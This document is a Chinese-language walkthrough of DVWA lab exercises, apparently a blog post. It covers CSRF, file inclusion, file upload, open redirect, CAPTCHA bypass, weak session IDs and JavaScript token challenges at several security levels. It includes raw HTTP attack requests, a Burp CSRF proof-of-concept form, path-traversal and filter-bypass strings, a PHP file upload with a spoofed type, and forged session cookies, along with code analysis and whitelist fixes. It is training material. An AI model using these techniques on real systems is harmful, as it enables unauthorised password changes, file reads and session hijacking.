一、csrf
1、csrf(low)
限制
复现
php
GET /vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change HTTP/1.1
Host: ddd.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ddd.com/vulnerabilities/csrf/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=e8ho8oc19et24e69md8905qmk8; security=low
Connection: close
伪造代码
php
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://ddd.com/vulnerabilities/csrf/">
<input type="hidden" name="password_new" value="123456" />
<input type="hidden" name="password_conf" value="123456" />
<input type="hidden" name="Change" value="Change" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
模仿受害者点击
![](https://file.jishuzhan.net/article/1764245585814097921/bed706535f35f36532f26aa8224c0e98.webp)
点击后修改成功
![](https://file.jishuzhan.net/article/1764245585814097921/569d74e7cc364060c54975deb568f872.webp)
代码
没有token机制
![](https://file.jishuzhan.net/article/1764245585814097921/34713ccd2e654ce1e46cb9f957a3073b.webp)
修复
生成token,提交表单
![](https://file.jishuzhan.net/article/1764245585814097921/f83efc6097dca5de955621586218f7b8.webp)
验证token
![](https://file.jishuzhan.net/article/1764245585814097921/3a291a0bc7653380d2d8e5af2468422a.webp)
2、csrf(medium)
限制
复现
php
GET /vulnerabilities/csrf/?password_new=1qaz1qaz&password_conf=1qaz1qaz&Change=Change HTTP/1.1
Host: ddd.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ddd.com/vulnerabilities/csrf/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=rrmj945okv8c6mbqj22gua721r; security=medium
Connection: close
构造同域名
![](https://file.jishuzhan.net/article/1764245585814097921/68f274e24fb8ff40dc06a638654549c5.webp)
启动http服务
![](https://file.jishuzhan.net/article/1764245585814097921/c3730e3c88c8f1d9b3d6bbf20ac916af.webp)
模仿受害者点击,此时的Referer,已经包含需要的域名
![](https://file.jishuzhan.net/article/1764245585814097921/e3efb5212adb80195f9108ea098508ff.webp)
点击后修改成功
![](https://file.jishuzhan.net/article/1764245585814097921/4f219aa0296d0e7ef1bb9c7f2676b401.webp)
代码
存在Referer验证请求来源,替换同域名即可成功。构造同域名
![](https://file.jishuzhan.net/article/1764245585814097921/9d3c5796cde163a79c6b6f41563bfc7d.webp)
修复
生成token并验证,提交表单
3、csrf(high)
限制
复现
php
GET /vulnerabilities/csrf/?password_new=qawwz&password_conf=qawwz&Change=Change&user_token=69371e451b62fe4a6a0275bbdddf1aa5 HTTP/1.1
Host: ddd.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ddd.com/vulnerabilities/csrf/?password_new=qaz&password_conf=qaz&csrf_token=5624d372f71b20d90f329da069411b20f072cdf777de7320afd1de566b1cfc39&Change=Change&user_token=373fbc54c43123e7c30da432d964ab32
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=rrmj945okv8c6mbqj22gua721r; security=high
Connection: close
同中等级一样构造同域名
存在Referer验证请求来源,构造同域名
![](https://file.jishuzhan.net/article/1764245585814097921/68f274e24fb8ff40dc06a638654549c5.webp)
启动http服务
![](https://file.jishuzhan.net/article/1764245585814097921/c3730e3c88c8f1d9b3d6bbf20ac916af.webp)
模仿受害者点击,此时的Referer,已经包含需要的域名
![](https://file.jishuzhan.net/article/1764245585814097921/e3efb5212adb80195f9108ea098508ff.webp)
点击后修改成功
![](https://file.jishuzhan.net/article/1764245585814097921/4f219aa0296d0e7ef1bb9c7f2676b401.webp)
代码
由首页进入high.php代码页面
![](https://file.jishuzhan.net/article/1764245585814097921/6c8ead9ae3f7266ae28e51a75124d59c.webp)
如果change参数存在进入验证token步骤
![](https://file.jishuzhan.net/article/1764245585814097921/6ea3923da2afa93bc76750add81a8e18.webp)
检测disable_authentication是否在$_DVWA数组里,存在则返回true,就直接跳出不会进入下面的if.
如果上面为false就会进入下面的验证token.如果传入的token不等于生成的token,或者不存在token.就提醒token不正确,然后返回到index.php
![](https://file.jishuzhan.net/article/1764245585814097921/b8285e39ab3bc6517ed71e3ed2f8436c.webp)
虽然代码有验证,但是验证是未开启状态
![](https://file.jishuzhan.net/article/1764245585814097921/36dff416970d3f29aaad9463a9387d46.webp)
修复
$_DVWA[ 'disable_authentication' ] = true;(禁用认证=对)
$_DVWA[ 'disable_authentication' ] = false;(禁用认证=不禁用)
只需要将禁用认证开启即可
![](https://file.jishuzhan.net/article/1764245585814097921/db522fe5b70d206c34cad6f4641c162c.webp)
4、csrf(impossible)
代码
不存在csrf原因,添加了输入原密码,并且将原密码做了防注入
二、文件包含
1、文件包含(low)
限制
复现
php
GET /vulnerabilities/fi/?page=../../phpinfo.php HTTP/1.1
Host: ddd.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=rrmj945okv8c6mbqj22gua721r; security=low
Connection: close
读取一个不存在的文件,报错显示出路径
![](https://file.jishuzhan.net/article/1764245585814097921/77ceedba85d4ed80baca0c2600df3a2f.webp)
直接跳到跟目录读取phpinfo.php(靶场自带文件)
![](https://file.jishuzhan.net/article/1764245585814097921/b6609803df27642b7edcba737fae0e77.webp)
代码
修复
在刚进入的页面做白名单限制,只允许包含这几个文件
![](https://file.jishuzhan.net/article/1764245585814097921/e99f521d60191afba723aa2e3562a519.webp)
php
if( isset( $file ) ){
$whitelist = array(
'file1.php',
'file2.php',
'include.php',
'file3.php'
);
if (in_array($file, $whitelist)) {
include $file; // 如果在白名单内,正常执行包含文件
} else {
header( 'Location:?page=include.php' );
exit;// 否则结束程序
}
}
2、文件包含(medium)
限制
复现
php
GET /vulnerabilities/fi/?page=....//....//phpinfo.php HTTP/1.1
Host: ddd.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=rrmj945okv8c6mbqj22gua721r; security=medium
Connection: close
![](https://file.jishuzhan.net/article/1764245585814097921/7b746e045eada70e5e5af43a64162565.webp)
代码
过滤 ../,为空。
使用 ....//....//绕过
![](https://file.jishuzhan.net/article/1764245585814097921/3be285c9494921cb232fafff193149b2.webp)
修复
使用白名单限制
![](https://file.jishuzhan.net/article/1764245585814097921/e99f521d60191afba723aa2e3562a519.webp)
3、文件包含(high)
限制
复现
php
GET /vulnerabilities/fi/?page=file://E:/code/php/DVWA-master/phpinfo.php HTTP/1.1
Host: ddd.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ddd.com/vulnerabilities/fi/?page=include.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=rrmj945okv8c6mbqj22gua721r; security=high
Connection: close
![](https://file.jishuzhan.net/article/1764245585814097921/febe878e217569898eac8b38221759f6.webp)
代码
fnmatch() 函数根据指定的模式来匹配文件名或字符串。
从file变量匹配传入的值是否以file开头,如果不是以file开头并且不等于inclide.php就会进入下面的代码。
绕过:只需要成立一个条件,要么是以file开头,要么file变量等于include.php就会跳出代码
![](https://file.jishuzhan.net/article/1764245585814097921/822844db2cec914e3505a402a51a19c4.webp)
修复
白名单yyds
![](https://file.jishuzhan.net/article/1764245585814097921/e99f521d60191afba723aa2e3562a519.webp)
4、文件包含(impossible)
此等级不存在漏洞
将接受的传参进行判断,如果不是include.php、file1.php、file2.php、file3.php这些文件就直接返回错误
![](https://file.jishuzhan.net/article/1764245585814097921/55c3bdd6ebe69b94760cc072b30d76a4.webp)
三、文件上传
1、文件上传(low)
限制
复现
直接上传1.php(<?php phpinfo();?>)
php
POST /vulnerabilities/upload/ HTTP/1.1
Host: ddd.com
Content-Length: 420
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://ddd.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqBoMTirx30PfCVyq
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ddd.com/vulnerabilities/upload/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=kt322mru8fjkglut8qp02asnnb; security=low
Connection: close
------WebKitFormBoundaryqBoMTirx30PfCVyq
Content-Disposition: form-data; name="MAX_FILE_SIZE"
100000
------WebKitFormBoundaryqBoMTirx30PfCVyq
Content-Disposition: form-data; name="uploaded"; filename="1.php"
Content-Type: application/octet-stream
<?php phpinfo();?>
------WebKitFormBoundaryqBoMTirx30PfCVyq
Content-Disposition: form-data; name="Upload"
Upload
------WebKitFormBoundaryqBoMTirx30PfCVyq--
代码
只将接受的文件名和文件路径进行拼接,然后判断是否将文件移动成功
![](https://file.jishuzhan.net/article/1764245585814097921/26e384c6b962f327dbdc8e880c6b6c19.webp)
修复
创建白名单,判断文件名后缀是否在白名单内
![](https://file.jishuzhan.net/article/1764245585814097921/ff8b0c6a3f8151122400dbc544c140af.webp)
2、文件上传(medium)
限制
复现
php
POST /vulnerabilities/upload/ HTTP/1.1
Host: ddd.com
Content-Length: 406
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://ddd.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryci2GkJlwp5BrsYji
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ddd.com/vulnerabilities/upload/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=kt322mru8fjkglut8qp02asnnb; security=medium
Connection: close
------WebKitFormBoundaryci2GkJlwp5BrsYji
Content-Disposition: form-data; name="MAX_FILE_SIZE"
100000
------WebKitFormBoundaryci2GkJlwp5BrsYji
Content-Disposition: form-data; name="uploaded"; filename="1.php"
Content-Type: image/jpeg
<?php phpinfo();?>
------WebKitFormBoundaryci2GkJlwp5BrsYji
Content-Disposition: form-data; name="Upload"
Upload
------WebKitFormBoundaryci2GkJlwp5BrsYji--
![](https://file.jishuzhan.net/article/1764245585814097921/0bc62001e02a00eac2df71de1057b846.webp)
代码
只判断了类型,没有判断文件后缀
![](https://file.jishuzhan.net/article/1764245585814097921/fc18a89104c02a8a3170824835d54888.webp)
修复
将接受的文件名打散成数组,再去判断数组的最后一个字符是否存在php。
但是黑名单限制并不安全,可以使用php112345...、PHP、Pph、pHp、phP等方式绕过
![](https://file.jishuzhan.net/article/1764245585814097921/56be3d8449810530a17ae556f145ca9d.webp)
最新修复.使用白名单方式
![](https://file.jishuzhan.net/article/1764245585814097921/014c71313c248b7f7445910aee84db67.webp)
3、文件上传(high)
限制
复现
php
GET /vulnerabilities/upload/fileclude.php?filepath=../../hackable/uploads/2.jpg HTTP/1.1
Host: ddd.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: security=high; PHPSESSID=0qlcn5rvk554nuugnh67jjn2du
Connection: close
这里代码做的限制比较多,判断了文件名和文件属性,直接上传无法绕过,只能配合文件包含漏洞上传图片马
![](https://file.jishuzhan.net/article/1764245585814097921/84fed94b0ad40c4afc59ea5d2dc0c232.webp)
代码
将上传的文件进行多个判断条件较为苛刻,文件名后缀、文件大小、文件内容等属性。相当于白名单限制。所以漏洞不存在绕过。
![](https://file.jishuzhan.net/article/1764245585814097921/4f2a314490ee92c22447a38127c41cbe.webp)
修复
此等级不存在上传漏洞,除非利用文件包含来进行绕过
4、文件上传(impossible)
不会造成漏洞原因:
存在upload参数进入token验证。
对文件名及文件进行处理,截取文件后缀判断是否等于jpg、jpeg、png并将后缀小写,判断了文件大小及文件类型,所有条件都成立才会进行上传,否则返回错误
代码
四、url重定向
1、重定向(low)
限制
复现
php
GET /vulnerabilities/open_redirect/source/low.php?redirect=https://www.baidu.com?id=1 HTTP/1.1
Host: ddd.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ddd.com/vulnerabilities/open_redirect/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=0qlcn5rvk554nuugnh67jjn2du; security=low
Connection: close
页面点击1或2,抓包将原本要跳转到info.php的页面改成https://www.baidu.com,即可跳转到baidu
代码
绕过:只要redirect传参不为空就可以
![](https://file.jishuzhan.net/article/1764245585814097921/7fa612d4395df808820e5512a25f7cd1.webp)
修复
创建个数组白名单,传参在白名单内就继续跳转,否则返回错误
![](https://file.jishuzhan.net/article/1764245585814097921/a78a042ce0f2eb73f61c47dd6af2a854.webp)
2、重定向(medium)
限制
复现
php
GET /vulnerabilities/open_redirect/source/medium.php?redirect=www.baidu.com?id=1 HTTP/1.1
Host: ddd.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ddd.com/vulnerabilities/open_redirect/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=b9tctcusv0410fdsbulugelgnf; security=medium
Connection: close
将redirect后面的参数修改成//www.baidu.com。因为限制了http://和https://。
![](https://file.jishuzhan.net/article/1764245585814097921/f06a6a2cd9df38c04402c012660ca4b4.webp)
代码
接受 redirect传参,并且不为空。
判断参数值是否存在http://、https://存在就进入返回错误。不存在就继续执行跳转代码
绕过:比如:https://www.baidu.com。可以直接传入//www.baidu.com也能跳转。因为//没有被限制
![](https://file.jishuzhan.net/article/1764245585814097921/0e7625556ed00d371230ed5ad46cabcb.webp)
修复
增加白名单机制,如果不在白名单就返回500报错。在白名单就继续执行。
![](https://file.jishuzhan.net/article/1764245585814097921/afb61bead53a313ea81e794aff7df87d.webp)
3、重定向(high)
限制
复现
php
GET /vulnerabilities/open_redirect/source/high.php?redirect=https://www.baidu.com/info.php?id=1 HTTP/1.1
Host: ddd.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ddd.com/vulnerabilities/open_redirect/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=b9tctcusv0410fdsbulugelgnf; security=high
Connection: close
在redirect参数加跳转地址,且必须存在info.php
![](https://file.jishuzhan.net/article/1764245585814097921/d4f53d7d8e4a2934497601d4eeccef43.webp)
代码
接受redirect参数,并且不为空就进入if,检查info.php在redirect值中是否存在,如果存在就为true,true不等于false,为true。就进入执行,否则返回500报错
代码限制redirect值必须存在info.php才可以。所以直接在info.php后门加跳转的地址即可
![](https://file.jishuzhan.net/article/1764245585814097921/25bfb445d4032616bb82c1b3b920869b.webp)
修复
使用白名单操作,如果在传参值在白名单内就进入执行,否则返回500报错
![](https://file.jishuzhan.net/article/1764245585814097921/3e679737ebb9f083c027672cd9900e5a.webp)
4、重定向(impossible)
代码
此等级不存在重定向
原因:做了白名单机制,接受 redirect参数,参数不为空,并且是整数型,只允许跳转到以下几个页面。
如果传入1、2、99之外的值或为空就报错
![](https://file.jishuzhan.net/article/1764245585814097921/1d16267e3a25d7801fc0bb67528719af.webp)
五、不安全的验证码
1、不安全的验证码(low)
限制
无
复现
php
POST /vulnerabilities/captcha/ HTTP/1.1
Host: ddd.com
Content-Length: 57
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://ddd.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ddd.com/vulnerabilities/captcha/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=n9j8g84sili69vejk04p7er7ge; security=low
Connection: close
step=2&password_new=qwqw&password_conf=qwqw&Change=Change
数据包里显示除了要修改的新密码参数和change参数,所以只有step是表示验证码的。修改密码后默认验证码是1.页面显示验证码不正确。抓包后将step改成2.即可修改密码成功
代码
修改密码根据step的值被分成两部分。
step==1时,recaptcha_check_answer函数,检验用户输入的验证码是否正确,验证通过后服务器返回表单。
![](https://file.jishuzhan.net/article/1764245585814097921/9c216697576038c30eae7343719c8efd.webp)
step==2时,然后使用提交 post 方法提交修改的密码。服务器仅检查 Change、step 参数来判断用户是否通过了验证,step参数时可以控制的
![](https://file.jishuzhan.net/article/1764245585814097921/eac281b2bbfd76f31dff35a0ff5dba4a.webp)
未修复
2、不安全的验证码()
限制
passed_captcha参数需要存在
复现
php
POST /vulnerabilities/captcha/ HTTP/1.1
Host: ddd.com
Content-Length: 77
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://ddd.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ddd.com/vulnerabilities/captcha/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=3ih9uqumo8a8l99hplirb0jsnt; security=medium
Connection: close
step=2&password_new=qqqq&password_conf=qqqq&passed_captcha=qqqq&Change=Change
将验证码字段改成2,在添加字段passed_captcha=qqqq
![](https://file.jishuzhan.net/article/1764245585814097921/82b6bb79420dfa8557b6db8ab082472b.webp)
代码
![](https://file.jishuzhan.net/article/1764245585814097921/294988db49db5ea0be6816b06dc35ea4.webp)
在low的代码基础上增加一步校验
如果不接受passed_captcha传参,返回不通过验证
![](https://file.jishuzhan.net/article/1764245585814097921/9fa22faa039e8831ccfb1a29aced51ae.webp)
未修复
六、Weak Session IDs
1、弱会话(Ⅰ)
限制
无
复现
php
POST /vulnerabilities/weak_id/ HTTP/1.1
Host: ddd.com
Content-Length: 0
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://ddd.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ddd.com/vulnerabilities/weak_id/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: dvwaSession=2; security=low; PHPSESSID=l0evfkg4ulratrosaij9g3ifkn
Connection: close
此数据包是登录后的。每次请求dvwaSession都会增加1
![](https://file.jishuzhan.net/article/1764245585814097921/df402064ad36f73cc73a3305d03331d9.webp)
payload:dvwaSession=13; PHPSESSID=trmp9eti71ocjubasa0fnlseq1; security=low
首先浏览器打开登录页面,使用hacker添加url为登录后的页面,选择cookie和对应的value,dvwaSession=13
![](https://file.jishuzhan.net/article/1764245585814097921/28a03d746aa9dd84210250d98dccd7e0.webp)
代码
检查请求方法是否为POST,如果是,则检查是否存在名为"last_session_id"的参数,如果没有就将这个参数设置为0。设置last_session_id递增,并将获取到值保存到dvwaSession的cookie中
![](https://file.jishuzhan.net/article/1764245585814097921/eb304c18c327703ecc1f737d2443c67d.webp)
修复
将cookie的dvwaSession生成随机32位的16进制字符串
![](https://file.jishuzhan.net/article/1764245585814097921/b2345d7e28fc54803f5230a4dad96351.webp)
2、弱会话(Ⅱ)
限制
时间戳转换
复现
php
POST /vulnerabilities/weak_id/ HTTP/1.1
Host: ddd.com
Content-Length: 0
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://ddd.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ddd.com/vulnerabilities/weak_id/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: dvwaSession=1681713158; PHPSESSID=trmp9eti71ocjubasa0fnlseq1; security=medium
Connection: close
此时的dvwaSession是以时间戳验证,只要大于当前时间既可以登录成功
代码
如果请求是post请求方式,将cookie设置当前时间的时间戳
![](https://file.jishuzhan.net/article/1764245585814097921/77223c0fb6785ef43d52c48793b3957d.webp)
修复
将cookie转换为时间戳后在md5加密
![](https://file.jishuzhan.net/article/1764245585814097921/52ff0d52cc1a71dba5a037592d47562f.webp)
3、弱会话(Ⅲ)
限制
md5解密
复现
php
POST /vulnerabilities/weak_id/ HTTP/1.1
Host: ddd.com
Content-Length: 0
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://ddd.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ddd.com/vulnerabilities/weak_id/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: dvwaSession=a87ff679a2f3e71d9181a67b7542122c; dvwaSession=989385e9f554a8185354ad11b45a1f74; PHPSESSID=trmp9eti71ocjubasa0fnlseq1; security=high
Connection: close
将cookie的dvwaSession进行md5加密
![](https://file.jishuzhan.net/article/1764245585814097921/b3741b3e4cbbe3420c73da68580f0c4c.webp)
代码
![](https://file.jishuzhan.net/article/1764245585814097921/ee6a8307da092221a09557782d59d585.webp)
未修复
七、JavaScript
1、JavaScript(low)
限制
先rot13加密,在MD5加密
复现
php
POST /vulnerabilities/javascript/ HTTP/1.1
Host: ddd.com
Content-Length: 65
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://ddd.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ddd.com/vulnerabilities/javascript/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=l0evfkg4ulratrosaij9g3ifkn; security=low
Connection: close
token=8b479aefbd90795395b3e7089ae0dc09&phrase=success&send=Submit
页面显示输入success就可以成功,但是显示token无效。从数据包发现我们传入的内容是phrass的值,不管传入什么值token都是一样的。
![](https://file.jishuzhan.net/article/1764245585814097921/82159308df36cd733d77b7ff442007d1.webp)
从代码层面分析到需要将传入的success先rot13加密,在MD5加密传给token
代码
如果请求方式是POST就接受token和phrase参数
如果phrase提交的是success,就判断token是不是rot13加密后md5加密的值,是就返回成功,否则token无效
![](https://file.jishuzhan.net/article/1764245585814097921/c3bfef6d64e9a0c292bd6ad6e69c10d6.webp)
2、javascript(medium)
限制
token需要字符串反转
复现
php
POST /vulnerabilities/javascript/ HTTP/1.1
Host: ddd.com
Content-Length: 44
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://ddd.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ddd.com/vulnerabilities/javascript/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=l0evfkg4ulratrosaij9g3ifkn; security=medium
Connection: close
token=XXsseccusXX&phrase=success&send=Submit
和low一样的是需要传入success.并且不管提交的phrase值是什么token的值都不变
![](https://file.jishuzhan.net/article/1764245585814097921/8f4d3e8837af3f3869a471b8db163d3c.webp)
代码
从代码分析,是将token值用strrev函数进行字符串反转才会成功,否则token无效。
![](https://file.jishuzhan.net/article/1764245585814097921/f7dcf2d1dd32e9c631d1e2122756a610.webp)
3、javascript(high)
限制
hash加密、strrev字符串反转
复现
php
POST /vulnerabilities/javascript/ HTTP/1.1
Host: ddd.com
Content-Length: 97
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://ddd.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ddd.com/vulnerabilities/javascript/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=trmp9eti71ocjubasa0fnlseq1; security=high
Connection: close
token=ec7ef8687050b6fe803867ea696734c67b541dfafb286a0b1239f42ac5b0aa84&phrase=success&send=Submit
提交success后在数据包将加密的token进行一一加密后在提交
php
1、strrev("success")字符串反转----sseccus
2、hash("sha256", "XX" . sseccus)----7f1bfaaf829f785ba5801d5bf68c1ecaf95ce04545462c8b8f311dfc9014068a
3、hash("sha256", "7f1bfaaf829f785ba5801d5bf68c1ecaf95ce04545462c8b8f311dfc9014068a" . "ZZ")--ec7ef8687050b6fe803867ea696734c67b541dfafb286a0b1239f42ac5b0aa84
![](https://file.jishuzhan.net/article/1764245585814097921/4e095f6369d4f15932c560f001234cee.webp)
代码
当token传入以下加密后的值才可以成功